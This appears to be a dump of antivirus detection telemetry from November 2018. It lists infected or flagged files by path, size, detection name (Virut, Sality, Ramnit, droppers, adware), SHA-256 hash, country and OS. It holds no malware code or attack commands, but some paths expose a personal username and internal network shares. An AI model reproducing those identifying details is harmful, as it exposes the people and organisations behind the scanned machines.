  Row(detection=Row(filename='avscan-20181101-111754-2f0411ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111754-2F0411BA', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:17:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gider ömer.exe', filepath='C:\\Users\\X\\CARİ GİDER ÖMER\\GİDER ÖMER.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:44:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ea5eb5e6bdeeb632c87be7c1a77f3deac575afe285544d62c9c13944eeb729b1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-18\\EA5EB5E6BDEEB632C87BE7C1A77F3DEAC575AFE285544D62C9C13944EEB729B1', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M300.#R300238'), hash='ea5eb5e6bdeeb632c87be7c1a77f3deac575afe285544d62c9c13944eeb729b1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:30:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='\\\\?\\C:\\Windows\\system32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='d8213db326927daea127aab9eca9553efdc173c1a3137c132564ec7ac71ec05b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:20:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmmotzosgz2.exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmmOTZOSGZ2.exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164354-3bb87710', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85699471\\AVSCAN-20181101-160404-9B7043B4\\AVSCAN-20181101-164354-3BB87710', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192433-ba574605', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_805ce542\\AVSCAN-20181101-192407-B7903B2C\\AVSCAN-20181101-192433-BA574605', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-140537-60e00b84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0286de76\\AVSCAN-20181101-140442-574AB5C5\\AVSCAN-20181101-140537-60E00B84', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:05:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2668.exe', filepath='\\\\NSHNRPTR\\scan\\2668.exe', filesize=640000, name='TR/Dropper.Gen.#M300.#R3873'), hash='0f07d20c1d9cf096d6c7dff1d49e70c95d28885c09443210d45dc71ac32c23b4', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T05:23:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T15:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T16:02:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:41:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='446e231233bc8f6fc72ab8ede4761370fa716a6424c73fbcfe49e1077c2edcf5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\446E231233BC8F6FC72AB8EDE4761370FA716A6424C73FBCFE49E1077C2EDCF5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='446e231233bc8f6fc72ab8ede4761370fa716a6424c73fbcfe49e1077c2edcf5', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:14:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001aa3', filepath='C:\\Windows\\Temp\\tmp00000308\\tmp00001aa3', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T13:40:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allfake.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-D5GS0.tmp\\AllFake.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:38:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00000832', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp00000832', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allfake.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-D5GS0.tmp\\AllFake.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='müzik defteri.exe', filepath='f:\\notalar\\repertuar şarkı sözleri\\fatih karışık\\MÜZİK DEFTERİ.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='7ab2fb5ced824b7d9fbdbbcafb30a241dfcc6d5be113053a80a4594d5d71a8f2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:42:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231441-06af878b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47a2b6b6\\AVSCAN-20181101-231356-00CA2820\\AVSCAN-20181101-231441-06AF878B', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:14:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234037-e757f525', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_790a7be5\\AVSCAN-20181101-234014-D9D7EFFD\\AVSCAN-20181101-234037-E757F525', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:40:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T05:21:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234553-d743ca49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0c39edaa\\AVSCAN-20181101-234351-C09CD210\\AVSCAN-20181101-234553-D743CA49', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T21:45:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000028-37f07471', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6c2d1c76\\AVSCAN-20181101-235957-32A427CB\\AVSCAN-20181102-000028-37F07471', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b4570', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b4570', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:55:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion[1].dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\L9K6TSEO\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:57:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141003-4eb6bb15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_067298d6\\AVSCAN-20181101-140206-1492E216\\AVSCAN-20181101-141003-4EB6BB15', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='5a39d78c094a3440154c296a0a634b850ccd751c7931fa829d5accaad239dc92', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:09:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:44:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182300-12a4059c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_48e0cd15\\AVSCAN-20181101-182237-0FF99EE0\\AVSCAN-20181101-182300-12A4059C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c770c4431647e097600953a9a34392e9da29f8a3de5dd3adce98dc3bc5872ca0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C770C4431647E097600953A9A34392E9DA29F8A3DE5DD3ADCE98DC3BC5872CA0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c770c4431647e097600953a9a34392e9da29f8a3de5dd3adce98dc3bc5872ca0', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:09:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='out_danger_umain', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_265276399\\out_danger_umain', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='b7011fa1fd95c3bf04d96faeb644cce75f61085750352b503a0c4f3cd7897344', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http-server\\http-server.exe', parentsize=5295616, timestamp='2018-11-01T09:15:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145904-819b29c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145904-819B29C7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\c:\\program files (x86)\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:41:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092014-b8361a0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_235acee9\\AVSCAN-20181101-091706-95192ACD\\AVSCAN-20181101-092014-B8361A0D', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:20:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='foto monev.exe', filepath='F:\\Foto Monev\\Foto Monev.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3395.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3395.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154604-cd2249ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154604-CD2249AE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_tarnnye.exe', filepath='D:\\Windows.old\\Windows\\System32\\spool\\drivers\\w32x86\\3\\E_TARNNYE.EXE', filesize=360000, name='W32/Sality.AT.#M1.#R1'), hash='d5b2352dca76c5fdd840a29563010563344efb1d2eb5cd9be338528f530da572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T05:37:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ace2cb691c408b678d2822c52779dcc258a16751518803e086ce31f1f13e2b13', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095505-78fd6d17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095505-78FD6D17', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bdd1e6ce49412a68dd6a913c0ffcba1fde42cb1f0f5e2921f60b0076324a656a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BDD1E6CE49412A68DD6A913C0FFCBA1FDE42CB1F0F5E2921F60B0076324A656A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bdd1e6ce49412a68dd6a913c0ffcba1fde42cb1f0f5e2921f60b0076324a656a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\E:\\8管理系统\\K3财务管理\\安装文件\\K3_Wise_v14.2_DVD\\Setup.exe', filesize=5120000, name='W32/Ramnit.CD.#M1.#R1'), hash='a6a0c25ec6b0b017f6262774fef48db21def6545255ab6ac993e826fa6faead3', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182527-2de4e438', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182527-2DE4E438', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201859-3c69c357', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae893140\\AVSCAN-20181101-200910-F22492D2\\AVSCAN-20181101-201859-3C69C357', filesize=256000, name='TR/AD.Inject.Y.#M1.#R1'), hash='9d6d3b95598efbfde9027931f8c12f8aedfdf33a0e75cdca7b900b4e77dead91', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:19:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d9a0952ad9f336396942dce03aab8e98105547fb1b286626f897e675b1684239', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T05:13:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ace2cb691c408b678d2822c52779dcc258a16751518803e086ce31f1f13e2b13', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-01T10:19:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150024-910030bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150024-910030BD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-221038-f54f2776', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181031-205716-48890BCA\\AVSCAN-20181031-221038-F54F2776', filesize=64000, name='TR/Crypt.XPACK.Gen2.#M300.#R100420'), hash='c3f3ba19bedc965c2885dfb09a210f95b83ad33bfc4545cd8ec07062ae42adac', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:10:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='putty.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\nightly.0\\Software\\OLD\\NetApp\\Putty\\putty.exe', filesize=512000, name='W32/Sality.Y.#M1.#R1'), hash='f36b6d1fcba331e24478910294eec7b1f989f8d79d97bfa15d6b246b09920cb0', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T08:44:24Z'), dt=datetime.date(2018, 11, 1)),
